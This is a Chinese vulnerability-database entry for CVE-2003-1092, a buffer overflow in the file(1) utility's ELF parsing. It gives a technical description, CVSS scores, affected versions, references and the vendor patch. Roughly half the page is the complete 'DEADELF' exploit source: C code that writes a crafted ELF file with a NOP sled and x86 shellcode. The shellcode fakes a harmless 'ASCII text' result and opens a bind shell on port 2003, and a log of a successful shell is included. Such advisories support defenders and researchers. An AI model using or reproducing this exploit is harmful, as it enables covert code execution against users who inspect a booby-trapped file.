CVE-2003-1092
CVSS7.5
发布时间 :2003-12-31 00:00:00
修订时间 :2008-09-05 16:36:01
NMCOE    

[原文]Unknown vulnerability in the "Automatic File Content Type Recognition (AFCTR) Tool version of the file package before 3.41, related to "a memory allocation problem," has unknown impact.


[CNNVD]file工具本地缓冲区溢出漏洞(CNNVD-200312-187)

        
        file(1)是一款查看文件类型的工具。
        file(1)命令存在一个缓冲区溢出漏洞,本地攻击者可以利用这个漏洞以执行用户权限在系统上执行任意指令。
        问题存在于readelf.c中的587行tryelf()函数的doshn()调用中:
        doshn(class, swap,
        fd,
        getu32(swap, elfhdr.e_shoff),
        getu16(swap, elfhdr.e_shnum),
        getu16(swap, elfhdr.e_shentsize));
        doshn() 'elfhdr.e_shentsize'最后一个参数将在之后用于readelf.c 133行的read()函数中:
        if (read(fd, sh_addr, size) == -1)
        read()调用会拷贝'size'字节到readelf.c 92行定义的'sh_addr'变量中:
        #define sh_addr (class == ELFCLASS32 \
         ? (void *) &sh32 \
         : (void *) &sh64)
        用于read()函数的缓冲区大小只有0x20 (32)字节,通过提供0x28 (40)字节的'size'参数可导致覆盖堆栈中的EBP和EIP寄存器而以其他用户权限执行任意代码。
        用户可以构建恶意文件诱使其他用户来分析,导致发生缓冲区溢出,而以执行用户权限执行任意指令。
        

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:christos_zoulas:file_1:3.28
cpe:/a:christos_zoulas:file_1:3.39
cpe:/a:christos_zoulas:file_1:3.36
cpe:/a:christos_zoulas:file_1:3.30
cpe:/a:christos_zoulas:file_1:3.40
cpe:/a:christos_zoulas:file_1:3.35
cpe:/a:christos_zoulas:file_1:3.34
cpe:/a:christos_zoulas:file_1:3.32
cpe:/a:christos_zoulas:file_1:3.33
cpe:/a:christos_zoulas:file_1:3.37

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1092
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-1092
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200312-187
(官方数据源) CNNVD

- 其它链接及资源

http://www.kb.cert.org/vuls/id/100937
(VENDOR_ADVISORY)  CERT-VN  VU#100937
http://xforce.iss.net/xforce/xfdb/11488
(UNKNOWN)  XF  file-afctr-memory-allocation(11488)
http://www.securityfocus.com/bid/7009
(UNKNOWN)  BID  7009
http://www.securityfocus.com/archive/1/313847
(UNKNOWN)  OPENPKG  OpenPKG-SA-2003.017

- 漏洞信息

file工具本地缓冲区溢出漏洞
高危 设计错误
2003-12-31 00:00:00 2005-10-20 00:00:00
本地  
        
        file(1)是一款查看文件类型的工具。
        file(1)命令存在一个缓冲区溢出漏洞,本地攻击者可以利用这个漏洞以执行用户权限在系统上执行任意指令。
        问题存在于readelf.c中的587行tryelf()函数的doshn()调用中:
        doshn(class, swap,
        fd,
        getu32(swap, elfhdr.e_shoff),
        getu16(swap, elfhdr.e_shnum),
        getu16(swap, elfhdr.e_shentsize));
        doshn() 'elfhdr.e_shentsize'最后一个参数将在之后用于readelf.c 133行的read()函数中:
        if (read(fd, sh_addr, size) == -1)
        read()调用会拷贝'size'字节到readelf.c 92行定义的'sh_addr'变量中:
        #define sh_addr (class == ELFCLASS32 \
         ? (void *) &sh32 \
         : (void *) &sh64)
        用于read()函数的缓冲区大小只有0x20 (32)字节,通过提供0x28 (40)字节的'size'参数可导致覆盖堆栈中的EBP和EIP寄存器而以其他用户权限执行任意代码。
        用户可以构建恶意文件诱使其他用户来分析,导致发生缓冲区溢出,而以执行用户权限执行任意指令。
        

- 公告与补丁

        厂商补丁:
        Christos Zoulas
        ---------------
        目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
        ftp://ftp.astron.com/pub/file/file-3.41.tar.gz

- 漏洞信息 (22326)

File 3.x Utility Local Memory Allocation Vulnerability (EDBID:22326)
linux local
2003-03-06 Verified
0 CrZ
N/A [点击下载]
source: http://www.securityfocus.com/bid/7009/info

It has been reported that a memory allocation issue exists the file program. Although details of this issue are currently unavailable, it is likely that this issue could be exploited to cause a denial of service condition, and potentially execute code as the user of the file utility. 

/*
\   __________________
/   Black Sand Project
\   __________________
/
\   Created by CrZ [crazy_einstein@yahoo.com] LimpidByte [lbyte.void.ru] /06.03.2003/
/
\   Bug discovered by iDEFENCE: http://www.idefense.com/advisory/03.04.03.txt
/   
\   program name: DEADELF
/
\   description: Exploit for file program <= 3.39
/
\   info: program create file-exploit and when you 
/   make "file /path/to/this/file-exploit" shell
\   will open on 2003 port.
/
\   Usage: ./85deadelf <file-exploit> [return address]
/
\   Example of work:
/
\	[crz@blacksand crz]$ gcc -o 85deadelf 85deadelf.c
/	[crz@blacksand crz]$ ./85deadelf deadelf
\	[+] Creating a evil file deadelf!
/	[+] Using address of shellcode = 0xbfffbd40
\	[crz@blacksand crz]$ file deadelf
/	File: ASCII text
\	[crz@blacksand crz]$ telnet localhost 2003
/	Trying 127.0.0.1...
\	Connected to blacksand (127.0.0.1).
/	Escape character is '^]'.
\	id;
/	uid=500(crz) gid=500(crz) groups=500(crz)
\	: command not found
/	exit;
\	Connection closed by foreign host.
/	[crz@blacksand crz]$
\
/   Tested against: file-3.37 (RedHat8.0)
\		    file-3.38 (RedHat8.0)
*/


#include <fcntl.h>
#include <elf.h>
#include <stdio.h>


void usage(char *prog) {

	printf("\nCreated by CrZ [crazy_einstein@yahoo.com] Limpid Byte [lbyte.void.ru]\n");
	printf("Usage: %s <name of evil file> [return address]\n\n",prog);
	exit(0);
}

int main(int argc, char **argv) {
	
/* 
\   a simple shellcode that show fake result of file program & bind
/   shell on 2003 port by CrZ
*/
	
char shellcode[]=
	"\x31\xc0\x31\xdb\x53\xb3\x01\x50" /* write(1,"File: ASCII text");*/
	"\x68\x01\x01\x0a\x0d\x68\x74\x65"
	"\x78\x74\x68\x43\x49\x49\x20\x68"
	"\x3a\x20\x41\x53\x68\x46\x69\x6c"
	"\x65\x89\xe1\xb2\x18\xb0\x04\xcd\x80"
        /* bind shell on 2003 port */
        "\x31\xc0\x89\xc3\xb0\x02\xcd\x80\x38\xc3\x74\x05\x8d\x43\x01\xcd\x80"
        "\x31\xc0\x89\x45\x10\x40\x89\xc3\x89\x45\x0c\x40\x89\x45\x08\x8d\x4d"
        "\x08\xb0\x66\xcd\x80\x89\x45\x08\x43\x66\x89\x5d\x14\x66\xc7\x45\x16"
        "\x07\xd3\x31\xd2\x89\x55\x18\x8d\x55\x14\x89\x55\x0c\xc6\x45\x10\x10"
        "\xb0\x66\xcd\x80\x40\x89\x45\x0c\x43\x43\xb0\x66\xcd\x80\x43\x89\x45"
        "\x0c\x89\x45\x10\xb0\x66\xcd\x80\x89\xc3\x31\xc9\xb0\x3f\xcd\x80\x41"
        "\x80\xf9\x03\x75\xf6\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62"
        "\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80";
	
	int fd,i;
	Elf32_Ehdr elfhdr;
	long xret=0xbfffbd40;
	char *evilfile="bl00mps";
	char tmp[100];
	
	if(!argv[1]) usage(argv[0]);
	else evilfile=argv[1];
	if(argv[2]) sscanf(argv[2],"0x%x",&xret);
	
	printf("[+] Creating a evil file %s!\n",evilfile);
	printf("[+] Using address of shellcode = 0x%x\n",xret);	
	
	sprintf(tmp,"echo>%s",evilfile);
	system(tmp);
	fd=open(evilfile,O_WRONLY);

	bzero(&elfhdr,sizeof elfhdr );
	elfhdr.e_type=1; //type should by NOT ET_CORE (4) & NOT ET_EXEC (2)
	sprintf(elfhdr.e_ident,"\x7f\x45\x4c\x46\x01\x01\x01"); //ELF32 FORMAT
	elfhdr.e_machine=1;
	elfhdr.e_version=1;
	elfhdr.e_entry=0;
	elfhdr.e_phoff=0;
	elfhdr.e_shoff=0;
	elfhdr.e_flags=0;
	elfhdr.e_ehsize=0;
	elfhdr.e_phentsize=0xfff; //define size for read()
	elfhdr.e_phnum=1; //this is for stop for() loop when read()
	elfhdr.e_shentsize=0xfff; //define size for read()
	elfhdr.e_shnum=1; //this is for stop for() loop when read()
	elfhdr.e_shstrndx=0;
	write(fd,&elfhdr,sizeof(elfhdr));
	
	for(i=0;i<20;i++) write(fd,&xret,4); //write new return address
	for(i=0;i<6000;i++) write(fd,"\x90",1); //write nops
	write(fd,&shellcode,sizeof shellcode); //write shellcode

	close(fd);

	
	return 0;	
}

		

- 漏洞信息

14743
AFCTR file Improper Memory Allocation

- 漏洞描述

Unknown or Incomplete

- 时间线

2003-03-04 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站